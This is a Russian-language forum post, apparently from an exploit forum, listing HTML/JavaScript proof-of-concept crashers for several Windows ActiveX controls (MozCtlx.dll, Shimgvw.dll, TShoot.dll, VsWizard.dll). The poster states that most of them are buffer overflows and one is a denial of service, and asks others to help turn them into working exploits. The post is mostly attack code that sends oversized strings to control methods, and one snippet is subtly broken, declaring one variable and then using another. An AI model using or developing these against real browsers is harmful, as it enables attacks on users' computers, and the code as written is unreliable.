Нашёл несколько багов в ActiveX компонентах, пробовал как то баги задействовать но знаний не хватает для полной реализации. Все кроме последнего вроде как buff overflow, а последний просто DoS. Может ктото посмотрит и попробует задействовать и если нельзя задействовать то напишите почему нельзя, а то я уже всю голову сломал Вот баги: MozCtlx.dll Code: <html> <body> <object classid="clsid:{1339B54C-3453-11D2-93B9-000000000000}" id=test></object> <script language="javascript"> var b = 'AAAA'; while (buff.length <= 500000) buff+=buff; test.Navigate(buff,0,0,0,0); </script> </body> </html> Этот баг должен работать у всех так как этот кмопонент лежит в system32 по умолчанию. Shimgvw.dll Code: <html> <body> <object classid="clsid:{50F16B26-467E-11D1-8271-00C04FC3183B}" id=test></object> <script language="javascript"> var buff = 'AAAA'; while (buff.length <= 6900000) buff+=buff; test.ShowFile(buff,0); </script> </body> </html> Этот тоже вроде должен у всех работать так как лежит в папке help где установлена винда. TShoot.dll Code: <html> <body> <object classid="clsid:{37536094-0A44-11D3-854B-004005506310}" id=test></object> <script language="javascript"> var buff = 'AAAA'; while (buff.length <= 6900000) buff+=buff; test.SetPair(buff,buff); </script> </body> </html> Code: <html> <body> <object classid="clsid:{37536094-0A44-11D3-854B-004005506310}" id=test></object> <script language="javascript"> var buff = 'AAAA'; while (buff.length <= 690000) buff+=buff; test.NotifyNothingChecked(buff); </script> </body> </html> Code: <html> <body> <object classid="clsid:{37536094-0A44-11D3-854B-004005506310}" id=test></object> <script language="javascript"> var buff = 'AAAA'; while (buff.length <= 6900000) buff+=buff; test.setLocale2(buff); </script> </body> </html> А этот баг я думал сначала что в результате переполнения возникает, а оказалось что если подставить buff.length <= 1 то IE всё равно падает. Так что это вроде как прото DoS VsWizard.dll Code: <html> <body> <object classid="clsid:{D4D285DD-2447-11D7-8BF6-00B0D03DAA06}" id=test></object> <script language="javascript"> var buff = 'AAAA'; while (buff.length <= 6900000) buff+=buff; test.InsertItem(buff,0); </script> </body> </html> Посмотрите у кого будет время баги и скажите можно ли чтото реализовать с помощью них или нет, а то у меня не получилось ничегою.
